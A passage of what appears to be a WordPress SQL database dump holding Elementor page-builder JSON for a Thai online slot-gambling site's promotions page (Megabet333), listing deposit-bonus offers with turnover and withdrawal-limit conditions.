\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong> \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e27\\u0e31\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 (\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(460,79,'_elementor_edit_mode','builder'),(461,79,'_elementor_template_type','wp-page'),(462,79,'_elementor_version','3.32.5'),(463,79,'_elementor_pro_version','3.32.3'),(464,79,'_wp_page_template','default'),(465,79,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(466,79,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d 